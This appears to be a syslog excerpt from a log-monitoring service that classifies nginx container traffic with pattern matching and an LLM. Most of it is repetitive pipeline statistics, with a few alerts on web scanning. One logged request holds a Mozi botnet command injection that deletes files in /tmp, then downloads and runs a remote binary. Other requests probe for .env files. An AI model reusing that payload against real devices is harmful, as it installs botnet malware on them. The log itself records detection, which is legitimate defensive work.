Mar 20 12:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:09:01.946715 [observer] Pipeline: processed=4865 pattern_hits=4759 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:09:01.946744 [observer] Patterns: hash=4759 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:09:31.937647 [observer] Pipeline: processed=4867 pattern_hits=4761 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:09:31.937673 [observer] Patterns: hash=4761 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:10:01.936928 [observer] Pipeline: processed=4871 pattern_hits=4765 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:10:01.936957 [observer] Patterns: hash=4765 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:10:31.943352 [observer] Pipeline: processed=4875 pattern_hits=4769 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:10:31.943383 [observer] Patterns: hash=4769 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:11:01.960228 [observer] Pipeline: processed=4877 pattern_hits=4771 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:11:01.960250 [observer] Patterns: hash=4771 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:11:31.940741 [observer] Pipeline: processed=4881 pattern_hits=4775 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:11:31.940768 [observer] Patterns: hash=4775 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:12:01.957063 [observer] Pipeline: processed=4883 pattern_hits=4777 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:12:01.957120 [observer] Patterns: hash=4777 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:12:31.936430 [observer] Pipeline: processed=4887 pattern_hits=4781 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:12:31.936464 [observer] Patterns: hash=4781 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:13:01.946357 [observer] Pipeline: processed=4889 pattern_hits=4783 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:13:01.946386 [observer] Patterns: hash=4783 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:13:31.935895 [observer] Pipeline: processed=4893 pattern_hits=4787 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:13:31.935920 [observer] Patterns: hash=4787 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:14:01.959270 [observer] Pipeline: processed=4895 pattern_hits=4789 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:14:01.959311 [observer] Patterns: hash=4789 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:14:31.950751 [observer] Pipeline: processed=4897 pattern_hits=4791 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:14:31.950783 [observer] Patterns: hash=4791 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:15:01.945619 [observer] Pipeline: processed=4901 pattern_hits=4795 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:15:01.945678 [observer] Patterns: hash=4795 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:15:31.944722 [observer] Pipeline: processed=4905 pattern_hits=4799 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:15:31.944753 [observer] Patterns: hash=4799 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:16:01.951375 [observer] Pipeline: processed=4909 pattern_hits=4803 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:16:01.951480 [observer] Patterns: hash=4803 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:16:31.936358 [observer] Pipeline: processed=4911 pattern_hits=4805 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:16:31.936379 [observer] Patterns: hash=4805 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:17:01.943674 [observer] Pipeline: processed=4915 pattern_hits=4809 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:17:01.943705 [observer] Patterns: hash=4809 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:17:31.939381 [observer] Pipeline: processed=4917 pattern_hits=4811 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:17:31.939415 [observer] Patterns: hash=4811 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:18:01.958420 [observer] Pipeline: processed=4919 pattern_hits=4813 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:18:01.958484 [observer] Patterns: hash=4813 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:18:31.938724 [observer] Pipeline: processed=4923 pattern_hits=4817 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:18:31.938754 [observer] Patterns: hash=4817 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:19:01.954834 [observer] Pipeline: processed=4925 pattern_hits=4819 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:19:01.954862 [observer] Patterns: hash=4819 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:19:31.935554 [observer] Pipeline: processed=4929 pattern_hits=4823 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:19:31.935579 [observer] Patterns: hash=4823 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:20:01.958642 [observer] Pipeline: processed=4931 pattern_hits=4825 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:20:01.958682 [observer] Patterns: hash=4825 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:20:31.934332 [observer] Pipeline: processed=4937 pattern_hits=4831 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:20:31.934359 [observer] Patterns: hash=4831 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:21:01.958128 [observer] Pipeline: processed=4939 pattern_hits=4833 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:21:01.959363 [observer] Patterns: hash=4833 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:21:31.954508 [observer] Pipeline: processed=4941 pattern_hits=4835 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:21:31.954536 [observer] Patterns: hash=4835 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:22:01.949606 [observer] Pipeline: processed=4945 pattern_hits=4839 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:22:01.949678 [observer] Patterns: hash=4839 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:22:31.950783 [observer] Pipeline: processed=4947 pattern_hits=4841 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:22:31.950814 [observer] Patterns: hash=4841 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:23:01.976299 [observer] Pipeline: processed=4951 pattern_hits=4845 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:23:01.976339 [observer] Patterns: hash=4845 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:23:31.935338 [observer] Pipeline: processed=4953 pattern_hits=4847 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:23:31.935366 [observer] Patterns: hash=4847 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:24:01.945577 [observer] Pipeline: processed=4957 pattern_hits=4851 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:24:01.945693 [observer] Patterns: hash=4851 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:24:31.935565 [observer] Pipeline: processed=4959 pattern_hits=4853 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:24:31.935593 [observer] Patterns: hash=4853 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:25:01.970105 [observer] Pipeline: processed=4962 pattern_hits=4856 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:25:01.970137 [observer] Patterns: hash=4856 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:25:31.935820 [observer] Pipeline: processed=4968 pattern_hits=4862 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:25:31.935844 [observer] Patterns: hash=4862 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:25:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:25:41.168679 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An access attempt to a sensitive file (.env) via HTTP, which is a common probe for exposed configuration data. Line=2026-03-20T12:25:41.168359479Z 2026/03/20 12:25:41 [error] 422#422: *749767 open() "/usr/share/nginx/default/.env" failed (2: No such file or directory), client: 193.239.176.135, server: _, request: "...
Mar 20 12:25:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:25:41.168769 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T12:25:41.168549666Z 193.239.176.135 - - [20/Mar/2026:12:25:41 +0000] "54.200.221.0" "GET /.env HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, l...
Mar 20 12:25:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:25:42.306474 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 405 on POST to root from an external IP suggests potential probing or misconfigured client attempting forbidden method; notable but not definitive threat. Line=2026-03-20T12:25:42.306182538Z 193.239.176.135 - - [20/Mar/2026:12:25:42 +0000] "54.200.221.0" "POST / HTTP/1.1" 405 552 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like ...
Mar 20 12:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:26:01.983043 [observer] Pipeline: processed=4973 pattern_hits=4867 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:26:01.983083 [observer] Patterns: hash=4867 prefix=0 regex=0 contains=0 deny=22 alert=305 suppress=0 misses=106
Mar 20 12:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:26:31.935547 [observer] Pipeline: processed=4977 pattern_hits=4871 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:26:31.935572 [observer] Patterns: hash=4871 prefix=0 regex=0 contains=0 deny=22 alert=305 suppress=0 misses=106
Mar 20 12:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:27:01.967699 [observer] Pipeline: processed=4979 pattern_hits=4873 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:27:01.967736 [observer] Patterns: hash=4873 prefix=0 regex=0 contains=0 deny=22 alert=305 suppress=0 misses=106
Mar 20 12:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:27:31.935233 [observer] Pipeline: processed=4983 pattern_hits=4877 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:27:31.935282 [observer] Patterns: hash=4877 prefix=0 regex=0 contains=0 deny=22 alert=305 suppress=0 misses=106
Mar 20 12:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:28:01.946200 [observer] Pipeline: processed=4985 pattern_hits=4879 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:28:01.946226 [observer] Patterns: hash=4879 prefix=0 regex=0 contains=0 deny=22 alert=305 suppress=0 misses=106
Mar 20 12:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:28:31.944317 [observer] Pipeline: processed=4987 pattern_hits=4881 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:28:31.944341 [observer] Patterns: hash=4881 prefix=0 regex=0 contains=0 deny=22 alert=305 suppress=0 misses=106
Mar 20 12:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:29:01.946512 [observer] Pipeline: processed=4991 pattern_hits=4885 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:29:01.946548 [observer] Patterns: hash=4885 prefix=0 regex=0 contains=0 deny=22 alert=305 suppress=0 misses=106
Mar 20 12:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:29:31.935835 [observer] Pipeline: processed=4993 pattern_hits=4887 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:29:31.935869 [observer] Patterns: hash=4887 prefix=0 regex=0 contains=0 deny=22 alert=305 suppress=0 misses=106
Mar 20 12:30:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:30:02.010021 [observer] Pipeline: processed=4997 pattern_hits=4891 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:30:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:30:02.010054 [observer] Patterns: hash=4891 prefix=0 regex=0 contains=0 deny=22 alert=305 suppress=0 misses=106
Mar 20 12:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:30:31.934206 [observer] Pipeline: processed=4999 pattern_hits=4893 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:30:31.934229 [observer] Patterns: hash=4893 prefix=0 regex=0 contains=0 deny=22 alert=305 suppress=0 misses=106
Mar 20 12:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:31:01.949743 [observer] Pipeline: processed=5005 pattern_hits=4899 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:31:01.949775 [observer] Patterns: hash=4899 prefix=0 regex=0 contains=0 deny=22 alert=305 suppress=0 misses=106
Mar 20 12:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:31:31.943600 [observer] Pipeline: processed=5007 pattern_hits=4901 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:31:31.943629 [observer] Patterns: hash=4901 prefix=0 regex=0 contains=0 deny=22 alert=305 suppress=0 misses=106
Mar 20 12:31:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:31:47.202085 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 20 12:31:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:31:47.202127 [analyzer] Confidence 0.78 too low for pattern learning (need 0.85+)
Mar 20 12:31:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:31:59.662347 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=malicious confidence=0.92 action=deny pattern_type=
Mar 20 12:31:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:31:59.662384 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Detected an open() failure on a suspicious path with a crafted request containing shell commands, indicating an attempted remote code execution or path traversal attack Line=2026-03-20T12:31:54.174360735Z 2026/03/20 12:31:54 [error] 422#422: *749828 open() "/usr/share/nginx/default/shell" failed (2: No such file or directory), client: 120.86.236.157, server: _, request: "...
Mar 20 12:31:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:31:59.662486 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T12:31:54.174491401Z 120.86.236.157 - - [20/Mar/2026:12:31:54 +0000] "54.200.221.0" "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1....
Mar 20 12:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:32:01.965131 [observer] Pipeline: processed=5012 pattern_hits=4904 llm_calls=108 llm_errors=1 learned=3
Mar 20 12:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:32:01.967840 [observer] Patterns: hash=4904 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=108
Mar 20 12:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:32:31.934513 [observer] Pipeline: processed=5016 pattern_hits=4908 llm_calls=108 llm_errors=1 learned=3
Mar 20 12:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:32:31.934537 [observer] Patterns: hash=4908 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=108
Mar 20 12:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:33:01.944548 [observer] Pipeline: processed=5018 pattern_hits=4910 llm_calls=108 llm_errors=1 learned=3
Mar 20 12:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:33:01.944582 [observer] Patterns: hash=4910 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=108
Mar 20 12:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:33:31.935837 [observer] Pipeline: processed=5022 pattern_hits=4914 llm_calls=108 llm_errors=1 learned=3
Mar 20 12:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:33:31.935862 [observer] Patterns: hash=4914 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=108
Mar 20 12:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:34:01.984004 [observer] Pipeline: processed=5024 pattern_hits=4916 llm_calls=108 llm_errors=1 learned=3
Mar 20 12:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:34:01.984340 [observer] Patterns: hash=4916 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=108
Mar 20 12:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:34:31.935380 [observer] Pipeline: processed=5028 pattern_hits=4920 llm_calls=108 llm_errors=1 learned=3
Mar 20 12:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:34:31.935405 [observer] Patterns: hash=4920 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=108
Mar 20 12:34:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:34:52.695660 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 12:34:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:34:52.695710 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 12:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:35:01.967917 [observer] Pipeline: processed=5033 pattern_hits=4923 llm_calls=110 llm_errors=1 learned=3
Mar 20 12:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:35:01.967952 [observer] Patterns: hash=4923 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=110
Mar 20 12:35:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:35:02.382664 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 12:35:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:35:02.382704 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 12:35:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:35:09.463312 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 12:35:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:35:09.463352 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 12:35:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:35:17.879293 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 12:35:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:35:17.879330 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 12:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:35:31.941336 [observer] Pipeline: processed=5037 pattern_hits=4925 llm_calls=112 llm_errors=1 learned=3
Mar 20 12:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:35:31.941362 [observer] Patterns: hash=4925 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=112
Mar 20 12:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:36:01.942952 [observer] Pipeline: processed=5043 pattern_hits=4931 llm_calls=112 llm_errors=1 learned=3
Mar 20 12:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:36:01.942978 [observer] Patterns: hash=4931 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=112
Mar 20 12:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:36:31.950389 [observer] Pipeline: processed=5045 pattern_hits=4933 llm_calls=112 llm_errors=1 learned=3
Mar 20 12:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:36:31.950415 [observer] Patterns: hash=4933 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=112
Mar 20 12:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:37:01.938781 [observer] Pipeline: processed=5049 pattern_hits=4937 llm_calls=112 llm_errors=1 learned=3
Mar 20 12:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:37:01.938809 [observer] Patterns: hash=4937 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=112
Mar 20 12:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:37:31.934285 [observer] Pipeline: processed=5051 pattern_hits=4939 llm_calls=112 llm_errors=1 learned=3
Mar 20 12:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:37:31.934308 [observer] Patterns: hash=4939 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=112
Mar 20 12:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:38:01.958292 [observer] Pipeline: processed=5055 pattern_hits=4943 llm_calls=112 llm_errors=1 learned=3
Mar 20 12:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:38:01.958327 [observer] Patterns: hash=4943 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=112
Mar 20 12:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:38:31.934257 [observer] Pipeline: processed=5057 pattern_hits=4945 llm_calls=112 llm_errors=1 learned=3
Mar 20 12:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:38:31.934279 [observer] Patterns: hash=4945 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=112
Mar 20 12:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:39:01.957032 [observer] Pipeline: processed=5059 pattern_hits=4947 llm_calls=112 llm_errors=1 learned=3
Mar 20 12:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:39:01.957062 [observer] Patterns: hash=4947 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=112
Mar 20 12:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:39:31.941152 [observer] Pipeline: processed=5063 pattern_hits=4951 llm_calls=112 llm_errors=1 learned=3
Mar 20 12:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:39:31.941353 [observer] Patterns: hash=4951 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=112
Mar 20 12:39:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:39:50.729875 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An access attempt to a sensitive file (.env) via HTTP, which is a common probe for exposed configuration data. Line=2026-03-20T12:39:50.727739337Z 2026/03/20 12:39:50 [error] 422#422: *749903 open() "/usr/share/nginx/default/.env" failed (2: No such file or directory), client: 107.172.116.57, server: _, request: "G...
